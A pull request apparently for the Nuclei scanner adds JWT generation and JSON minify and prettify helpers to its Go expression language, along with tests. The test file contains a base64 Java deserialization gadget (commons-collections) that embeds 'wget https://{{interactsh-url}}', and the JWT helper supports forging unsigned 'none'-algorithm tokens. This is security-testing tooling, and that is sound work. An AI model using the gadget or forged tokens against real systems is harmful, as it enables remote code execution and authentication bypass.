### PR TITLE
Add generate_jwt & json_{minify,prettify} helper functions

### DIFF
--- a/v2/go.mod
+++ b/v2/go.mod
@@ -67,6 +67,7 @@ require (
 	github.com/go-git/go-git/v5 v5.5.1
 	github.com/h2non/filetype v1.1.3
 	github.com/hashicorp/go-version v1.6.0
+	github.com/kataras/jwt v0.1.8
 	github.com/klauspost/compress v1.15.13
 	github.com/labstack/echo/v4 v4.10.0
 	github.com/mholt/archiver v3.1.1+incompatible

--- a/v2/go.sum
+++ b/v2/go.sum
@@ -393,6 +393,8 @@ github.com/kataras/golog v0.0.9/go.mod h1:12HJgwBIZFNGL0EJnMRhmvGA0PQGx8VFwrZtM4
 github.com/kataras/golog v0.0.10/go.mod h1:yJ8YKCmyL+nWjERB90Qwn+bdyBZsaQwU3bTVFgkFIp8=
 github.com/kataras/iris/v12 v12.0.1/go.mod h1:udK4vLQKkdDqMGJJVd/msuMtN6hpYJhg/lSzuxjhO+U=
 github.com/kataras/iris/v12 v12.1.8/go.mod h1:LMYy4VlP67TQ3Zgriz8RE2h2kMZV2SgMYbq3UhfoFmE=
+github.com/kataras/jwt v0.1.8 h1:u71baOsYD22HWeSOg32tCHbczPjdCk7V4MMeJqTtmGk=
+github.com/kataras/jwt v0.1.8/go.mod h1:Q5j2IkcIHnfwy+oNY3TVWuEBJNw0ADgCcXK9CaZwV4o=
 github.com/kataras/neffos v0.0.10/go.mod h1:ZYmJC07hQPW67eKuzlfY7SO3bC0mw83A3j6im82hfqw=
 github.com/kataras/neffos v0.0.14/go.mod h1:8lqADm8PnbeFfL7CLXh1WHw53dG27MC3pgi2R1rmoTE=
 github.com/kataras/pio v0.0.0-20190103105442-ea782b38602d/go.mod h1:NV88laa9UiiDuX9AhMbDPkGYSPugBOV6yTZB1l2K9Z0=

--- a/v2/pkg/operators/common/dsl/dsl.go
+++ b/v2/pkg/operators/common/dsl/dsl.go
@@ -837,6 +837,37 @@ func init() {
 
 			return tokenString, nil
 		}),
+		"json_minify": makeDslFunction(1, func(args ...interface{}) (interface{}, error) {
+			var data map[string]string
+
+			err := json.Unmarshal([]byte(args[0].(string)), &data)
+			if err != nil {
+				return nil, err
+			}
+
+			minified, err := json.Marshal(data)
+			if err != nil {
+				return nil, err
+			}
+
+			return string(minified), nil
+		}),
+		"json_prettify": makeDslFunction(1, func(args ...interface{}) (interface{}, error) {
+			var buf bytes.Buffer
+
+			err := json.Indent(&buf, []byte(args[0].(string)), "", "    ")
+			if err != nil {
+				return nil, err
+			}
+
+			return buf.String(), nil
+		}),
+		"quote_escape": makeDslFunction(1, func(args ...interface{}) (interface{}, error) {
+			escaped := strconv.Quote(args[0].(string))
+			trimmed := strings.Trim(escaped, `"`)
+
+			return trimmed, nil
+		}),
 	}
 
 	dslFunctions = make(map[string]dslFunction, len(tempDslFunctions))

--- a/v2/pkg/operators/common/dsl/dsl.go
+++ b/v2/pkg/operators/common/dsl/dsl.go
@@ -1235,9 +1235,5 @@ func (a *algNONE) Verify(key jwt.PublicKey, headerAndPayload []byte, signature [
 
 func checkNoneAlgorithm(alg string) bool {
 	alg = strings.TrimSpace(alg)
-	alg = strings.ToLower(alg)
-	if alg == "none" {
-		return true
-	}
-	return false
+	return alg == strings.ToLower(alg)
 }

--- a/v2/pkg/operators/common/dsl/dsl.go
+++ b/v2/pkg/operators/common/dsl/dsl.go
@@ -888,7 +888,7 @@ func init() {
 						return nil, err
 					}
 
-					duration := optionalMaxAgeUnix.Sub(time.Now())
+					duration := time.Until(optionalMaxAgeUnix)
 					signOpts = append(signOpts, jwt.MaxAge(duration))
 				}
 

--- a/v2/pkg/operators/common/dsl/dsl.go
+++ b/v2/pkg/operators/common/dsl/dsl.go
@@ -919,12 +919,6 @@ func init() {
 
 			return buf.String(), nil
 		}),
-		"quote_escape": makeDslFunction(1, func(args ...interface{}) (interface{}, error) {
-			escaped := strconv.Quote(args[0].(string))
-			trimmed := strings.Trim(escaped, `"`)
-
-			return trimmed, nil
-		}),
 	}
 
 	dslFunctions = make(map[string]dslFunction, len(tempDslFunctions))

--- a/v2/pkg/operators/common/dsl/dsl.go
+++ b/v2/pkg/operators/common/dsl/dsl.go
@@ -818,6 +818,9 @@ func init() {
 			signature := []byte(args[1].(string))
 			algorithm := args[2].(string)
 
+			// Valid algorithms are: RS256, HS256, RS384, RS512, PS384, ES256, EdDSA, HS384, HS512, PS256, ES384, ES512, PS512.
+			// Use github.com/golang-jwt/jwt/v4.GetAlgorithms().
+
 			signingMethod := jwt.GetSigningMethod(algorithm)
 			if signingMethod == nil || signingMethod == jwt.SigningMethodNone {
 				return nil, fmt.Errorf("invalid algorithm: %s", algorithm)

--- a/v2/pkg/operators/common/dsl/dsl.go
+++ b/v2/pkg/operators/common/dsl/dsl.go
@@ -838,7 +838,7 @@ func init() {
 			return tokenString, nil
 		}),
 		"json_minify": makeDslFunction(1, func(args ...interface{}) (interface{}, error) {
-			var data map[string]string
+			var data map[string]interface{}
 
 			err := json.Unmarshal([]byte(args[0].(string)), &data)
 			if err != nil {

--- a/v2/pkg/operators/common/dsl/dsl.go
+++ b/v2/pkg/operators/common/dsl/dsl.go
@@ -870,9 +870,8 @@ func init() {
 						algorithm = jwt.EdDSA
 					}
 
-					if checkNoneAlgorithm(alg) {
-						NoneAlgValue = alg
-						algorithm = &algNONE{}
+					if isjwtAlgorithmNone(alg) {
+						algorithm = &algNONE{algValue: alg}
 					}
 					if algorithm == nil {
 						return nil, fmt.Errorf("invalid algorithm: %s", optionalAlgorithm)
@@ -1213,12 +1212,12 @@ func (e *CompilationError) Unwrap() error {
 	return e.WrappedError
 }
 
-var NoneAlgValue string = "NONE"
-
-type algNONE struct{}
+type algNONE struct {
+	algValue string
+}
 
 func (a *algNONE) Name() string {
-	return NoneAlgValue
+	return a.algValue
 }
 
 func (a *algNONE) Sign(key jwt.PrivateKey, headerAndPayload []byte) ([]byte, error) {
@@ -1233,7 +1232,7 @@ func (a *algNONE) Verify(key jwt.PublicKey, headerAndPayload []byte, signature [
 	return nil
 }
 
-func checkNoneAlgorithm(alg string) bool {
+func isjwtAlgorithmNone(alg string) bool {
 	alg = strings.TrimSpace(alg)
-	return alg == strings.ToLower(alg)
+	return strings.ToLower(alg) == "none"
 }

--- a/v2/pkg/operators/common/dsl/dsl_test.go
+++ b/v2/pkg/operators/common/dsl/dsl_test.go
@@ -269,6 +269,9 @@ func TestDslExpressions(t *testing.T) {
 		`uniq("ab", "cd", "12", "34", "12", "cd")`:                []string{"ab", "cd", "12", "34"},
 		`join(" ", uniq("ab", "cd", "12", "34", "12", "cd"))`:     "ab cd 12 34",
 		`join(", ", split(hex_encode("abcdefg"), 2))`:             "61, 62, 63, 64, 65, 66, 67",
+		`json_minify("{  \"name\":  \"John Doe\",   \"foo\":  \"bar\"     }")`: "{\"foo\":\"bar\",\"name\":\"John Doe\"}",
+		`json_prettify("{\"foo\":\"bar\",\"name\":\"John Doe\"}")`:             "{\n    \"foo\": \"bar\",\n    \"name\": \"John Doe\"\n}",
+		`quote_escape("Hell\"o, www\"or\"ld")`:                                 "Hell\\\"o, www\\\"or\\\"ld",
 	}
 
 	testDslExpressionScenarios(t, dslExpressions)

--- a/v2/pkg/operators/common/dsl/dsl_test.go
+++ b/v2/pkg/operators/common/dsl/dsl_test.go
@@ -108,7 +108,7 @@ func TestGetPrintableDslFunctionSignatures(t *testing.T) {
 	dec_to_hex(arg1 interface{}) interface{}
 	ends_with(str string, suffix ...string) bool
 	generate_java_gadget(arg1, arg2, arg3 interface{}) interface{}
-	generate_jwt(arg1, arg2, arg3 interface{}) interface{}
+	generate_jwt(jsonString, optionalAlgorithm, optionalSignature string, optionalMaxAgeUnix interface{}) string
 	gzip(arg1 interface{}) interface{}
 	gzip_decode(arg1 interface{}) interface{}
 	hex_decode(arg1 interface{}) interface{}
@@ -220,7 +220,7 @@ func TestDslExpressions(t *testing.T) {
 		`zlib_decode(hex_decode("789cf248cdc9c907040000ffff058c01f5"))`:                               "Hello",
 		`gzip_decode(hex_decode("1f8b08000000000000fff248cdc9c907040000ffff8289d1f705000000"))`:       "Hello",
 		`generate_java_gadget("commons-collections3.1", "wget https://{{interactsh-url}}", "base64")`: "rO0ABXNyABFqYXZhLnV0aWwuSGFzaFNldLpEhZWWuLc0AwAAeHB3DAAAAAI/QAAAAAAAAXNyADRvcmcuYXBhY2hlLmNvbW1vbnMuY29sbGVjdGlvbnMua2V5dmFsdWUuVGllZE1hcEVudHJ5iq3SmznBH9sCAAJMAANrZXl0ABJMamF2YS9sYW5nL09iamVjdDtMAANtYXB0AA9MamF2YS91dGlsL01hcDt4cHQAJmh0dHBzOi8vZ2l0aHViLmNvbS9qb2FvbWF0b3NmL2pleGJvc3Mgc3IAKm9yZy5hcGFjaGUuY29tbW9ucy5jb2xsZWN0aW9ucy5tYXAuTGF6eU1hcG7llIKeeRCUAwABTAAHZmFjdG9yeXQALExvcmcvYXBhY2hlL2NvbW1vbnMvY29sbGVjdGlvbnMvVHJhbnNmb3JtZXI7eHBzcgA6b3JnLmFwYWNoZS5jb21tb25zLmNvbGxlY3Rpb25zLmZ1bmN0b3JzLkNoYWluZWRUcmFuc2Zvcm1lcjDHl%2BwoepcEAgABWwANaVRyYW5zZm9ybWVyc3QALVtMb3JnL2FwYWNoZS9jb21tb25zL2NvbGxlY3Rpb25zL1RyYW5zZm9ybWVyO3hwdXIALVtMb3JnLmFwYWNoZS5jb21tb25zLmNvbGxlY3Rpb25zLlRyYW5zZm9ybWVyO71WKvHYNBiZAgAAeHAAAAAFc3IAO29yZy5hcGFjaGUuY29tbW9ucy5jb2xsZWN0aW9ucy5mdW5jdG9ycy5Db25zdGFudFRyYW5zZm9ybWVyWHaQEUECsZQCAAFMAAlpQ29uc3RhbnRxAH4AA3hwdnIAEWphdmEubGFuZy5SdW50aW1lAAAAAAAAAAAAAAB4cHNyADpvcmcuYXBhY2hlLmNvbW1vbnMuY29sbGVjdGlvbnMuZnVuY3RvcnMuSW52b2tlclRyYW5zZm9ybWVyh%2Bj/a3t8zjgCAANbAAVpQXJnc3QAE1tMamF2YS9sYW5nL09iamVjdDtMAAtpTWV0aG9kTmFtZXQAEkxqYXZhL2xhbmcvU3RyaW5nO1sAC2lQYXJhbVR5cGVzdAASW0xqYXZhL2xhbmcvQ2xhc3M7eHB1cgATW0xqYXZhLmxhbmcuT2JqZWN0O5DOWJ8QcylsAgAAeHAAAAACdAAKZ2V0UnVudGltZXVyABJbTGphdmEubGFuZy5DbGFzczurFteuy81amQIAAHhwAAAAAHQACWdldE1ldGhvZHVxAH4AGwAAAAJ2cgAQamF2YS5sYW5nLlN0cmluZ6DwpDh6O7NCAgAAeHB2cQB%2BABtzcQB%2BABN1cQB%2BABgAAAACcHVxAH4AGAAAAAB0AAZpbnZva2V1cQB%2BABsAAAACdnIAEGphdmEubGFuZy5PYmplY3QAAAAAAAAAAAAAAHhwdnEAfgAYc3EAfgATdXIAE1tMamF2YS5sYW5nLlN0cmluZzut0lbn6R17RwIAAHhwAAAAAXQAH3dnZXQgaHR0cHM6Ly97e2ludGVyYWN0c2gtdXJsfX10AARleGVjdXEAfgAbAAAAAXEAfgAgc3EAfgAPc3IAEWphdmEubGFuZy5JbnRlZ2VyEuKgpPeBhzgCAAFJAAV2YWx1ZXhyABBqYXZhLmxhbmcuTnVtYmVyhqyVHQuU4IsCAAB4cAAAAAFzcgARamF2YS51dGlsLkhhc2hNYXAFB9rBwxZg0QMAAkYACmxvYWRGYWN0b3JJAAl0aHJlc2hvbGR4cD9AAAAAAAAAdwgAAAAQAAAAAHh4eA==",
-		`generate_jwt("{\"name\":\"John Doe\",\"foo\":\"bar\"}", "hello-world", "HS256")`:             "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJmb28iOiJiYXIiLCJuYW1lIjoiSm9obiBEb2UifQ.EsrL8lIcYJR_Ns-JuhF3VCllCP7xwbpMCCfHin_WT6U",
+		`generate_jwt("{\"name\":\"John Doe\",\"foo\":\"bar\"}", "HS256", "hello-world")`:             []byte("eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJmb28iOiJiYXIiLCJuYW1lIjoiSm9obiBEb2UifQ.EsrL8lIcYJR_Ns-JuhF3VCllCP7xwbpMCCfHin_WT6U"),
 		`base64_decode("SGVsbG8=")`:                               "Hello",
 		`hex_decode("6161")`:                                      "aa",
 		`len("Hello")`:                                            float64(5),

--- a/v2/pkg/operators/common/dsl/dsl_test.go
+++ b/v2/pkg/operators/common/dsl/dsl_test.go
@@ -128,7 +128,6 @@ func TestGetPrintableDslFunctionSignatures(t *testing.T) {
 	mmh3(arg1 interface{}) interface{}
 	oct_to_dec(arg1 interface{}) interface{}
 	print_debug(args ...interface{})
-	quote_escape(arg1 interface{}) interface{}
 	rand_base(length uint, optionalCharSet string) string
 	rand_char(optionalCharSet string) string
 	rand_int(optionalMin, optionalMax uint) int
@@ -271,7 +270,6 @@ func TestDslExpressions(t *testing.T) {
 		`join(", ", split(hex_encode("abcdefg"), 2))`:             "61, 62, 63, 64, 65, 66, 67",
 		`json_minify("{  \"name\":  \"John Doe\",   \"foo\":  \"bar\"     }")`: "{\"foo\":\"bar\",\"name\":\"John Doe\"}",
 		`json_prettify("{\"foo\":\"bar\",\"name\":\"John Doe\"}")`:             "{\n    \"foo\": \"bar\",\n    \"name\": \"John Doe\"\n}",
-		`quote_escape("Hell\"o, www\"or\"ld")`:                                 "Hell\\\"o, www\\\"or\\\"ld",
 	}
 
 	testDslExpressionScenarios(t, dslExpressions)

--- a/v2/pkg/operators/common/dsl/dsl_test.go
+++ b/v2/pkg/operators/common/dsl/dsl_test.go
@@ -108,6 +108,7 @@ func TestGetPrintableDslFunctionSignatures(t *testing.T) {
 	dec_to_hex(arg1 interface{}) interface{}
 	ends_with(str string, suffix ...string) bool
 	generate_java_gadget(arg1, arg2, arg3 interface{}) interface{}
+	generate_jwt(arg1, arg2, arg3 interface{}) interface{}
 	gzip(arg1 interface{}) interface{}
 	gzip_decode(arg1 interface{}) interface{}
 	hex_decode(arg1 interface{}) interface{}
@@ -216,6 +217,7 @@ func TestDslExpressions(t *testing.T) {
 		`zlib_decode(hex_decode("789cf248cdc9c907040000ffff058c01f5"))`:                               "Hello",
 		`gzip_decode(hex_decode("1f8b08000000000000fff248cdc9c907040000ffff8289d1f705000000"))`:       "Hello",
 		`generate_java_gadget("commons-collections3.1", "wget https://{{interactsh-url}}", "base64")`: "rO0ABXNyABFqYXZhLnV0aWwuSGFzaFNldLpEhZWWuLc0AwAAeHB3DAAAAAI/QAAAAAAAAXNyADRvcmcuYXBhY2hlLmNvbW1vbnMuY29sbGVjdGlvbnMua2V5dmFsdWUuVGllZE1hcEVudHJ5iq3SmznBH9sCAAJMAANrZXl0ABJMamF2YS9sYW5nL09iamVjdDtMAANtYXB0AA9MamF2YS91dGlsL01hcDt4cHQAJmh0dHBzOi8vZ2l0aHViLmNvbS9qb2FvbWF0b3NmL2pleGJvc3Mgc3IAKm9yZy5hcGFjaGUuY29tbW9ucy5jb2xsZWN0aW9ucy5tYXAuTGF6eU1hcG7llIKeeRCUAwABTAAHZmFjdG9yeXQALExvcmcvYXBhY2hlL2NvbW1vbnMvY29sbGVjdGlvbnMvVHJhbnNmb3JtZXI7eHBzcgA6b3JnLmFwYWNoZS5jb21tb25zLmNvbGxlY3Rpb25zLmZ1bmN0b3JzLkNoYWluZWRUcmFuc2Zvcm1lcjDHl%2BwoepcEAgABWwANaVRyYW5zZm9ybWVyc3QALVtMb3JnL2FwYWNoZS9jb21tb25zL2NvbGxlY3Rpb25zL1RyYW5zZm9ybWVyO3hwdXIALVtMb3JnLmFwYWNoZS5jb21tb25zLmNvbGxlY3Rpb25zLlRyYW5zZm9ybWVyO71WKvHYNBiZAgAAeHAAAAAFc3IAO29yZy5hcGFjaGUuY29tbW9ucy5jb2xsZWN0aW9ucy5mdW5jdG9ycy5Db25zdGFudFRyYW5zZm9ybWVyWHaQEUECsZQCAAFMAAlpQ29uc3RhbnRxAH4AA3hwdnIAEWphdmEubGFuZy5SdW50aW1lAAAAAAAAAAAAAAB4cHNyADpvcmcuYXBhY2hlLmNvbW1vbnMuY29sbGVjdGlvbnMuZnVuY3RvcnMuSW52b2tlclRyYW5zZm9ybWVyh%2Bj/a3t8zjgCAANbAAVpQXJnc3QAE1tMamF2YS9sYW5nL09iamVjdDtMAAtpTWV0aG9kTmFtZXQAEkxqYXZhL2xhbmcvU3RyaW5nO1sAC2lQYXJhbVR5cGVzdAASW0xqYXZhL2xhbmcvQ2xhc3M7eHB1cgATW0xqYXZhLmxhbmcuT2JqZWN0O5DOWJ8QcylsAgAAeHAAAAACdAAKZ2V0UnVudGltZXVyABJbTGphdmEubGFuZy5DbGFzczurFteuy81amQIAAHhwAAAAAHQACWdldE1ldGhvZHVxAH4AGwAAAAJ2cgAQamF2YS5sYW5nLlN0cmluZ6DwpDh6O7NCAgAAeHB2cQB%2BABtzcQB%2BABN1cQB%2BABgAAAACcHVxAH4AGAAAAAB0AAZpbnZva2V1cQB%2BABsAAAACdnIAEGphdmEubGFuZy5PYmplY3QAAAAAAAAAAAAAAHhwdnEAfgAYc3EAfgATdXIAE1tMamF2YS5sYW5nLlN0cmluZzut0lbn6R17RwIAAHhwAAAAAXQAH3dnZXQgaHR0cHM6Ly97e2ludGVyYWN0c2gtdXJsfX10AARleGVjdXEAfgAbAAAAAXEAfgAgc3EAfgAPc3IAEWphdmEubGFuZy5JbnRlZ2VyEuKgpPeBhzgCAAFJAAV2YWx1ZXhyABBqYXZhLmxhbmcuTnVtYmVyhqyVHQuU4IsCAAB4cAAAAAFzcgARamF2YS51dGlsLkhhc2hNYXAFB9rBwxZg0QMAAkYACmxvYWRGYWN0b3JJAAl0aHJlc2hvbGR4cD9AAAAAAAAAdwgAAAAQAAAAAHh4eA==",
+		`generate_jwt("{\"name\":\"John Doe\",\"foo\":\"bar\"}", "hello-world", "HS256")`:             "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJmb28iOiJiYXIiLCJuYW1lIjoiSm9obiBEb2UifQ.EsrL8lIcYJR_Ns-JuhF3VCllCP7xwbpMCCfHin_WT6U",
 		`base64_decode("SGVsbG8=")`:                               "Hello",
 		`hex_decode("6161")`:                                      "aa",
 		`len("Hello")`:                                            float64(5),

--- a/v2/pkg/operators/common/dsl/dsl_test.go
+++ b/v2/pkg/operators/common/dsl/dsl_test.go
@@ -119,6 +119,8 @@ func TestGetPrintableDslFunctionSignatures(t *testing.T) {
 	html_unescape(arg1 interface{}) interface{}
 	join(separator string, elements ...interface{}) string
 	join(separator string, elements []interface{}) string
+	json_minify(arg1 interface{}) interface{}
+	json_prettify(arg1 interface{}) interface{}
 	len(arg1 interface{}) interface{}
 	line_ends_with(str string, suffix ...string) bool
 	line_starts_with(str string, prefix ...string) bool
@@ -126,6 +128,7 @@ func TestGetPrintableDslFunctionSignatures(t *testing.T) {
 	mmh3(arg1 interface{}) interface{}
 	oct_to_dec(arg1 interface{}) interface{}
 	print_debug(args ...interface{})
+	quote_escape(arg1 interface{}) interface{}
 	rand_base(length uint, optionalCharSet string) string
 	rand_char(optionalCharSet string) string
 	rand_int(optionalMin, optionalMax uint) int


### PR DESCRIPTION
## Proposed changes

This change defines several functions that manipulate JSON strings in different ways:

- The `generate_jwt` function generates a JSON Web Token (JWT) using the claims provided in a JSON string, the signature, and the specified algorithm.
- The `json_minify` function minifies a JSON string by removing unnecessary whitespace.
- The `json_prettify` function prettifies a JSON string by adding indentation.


## Checklist

<!-- Put an "x" in the boxes that apply. You can also fill these out after creating the PR. If you're unsure about any of them, don't hesitate to ask. We're here to help! This is simply a reminder of what we are going to look for before merging your code. -->

- [x] Pull request is created against the [dev](https://github.com/projectdiscovery/nuclei/tree/dev) branch
- [x] All checks passed (lint, unit/integration/regression tests etc.) with my changes
- [x] I have added tests that prove my fix is effective or that my feature works
- [x] I have added necessary documentation (if appropriate) (https://github.com/projectdiscovery/nuclei-docs/pull/110)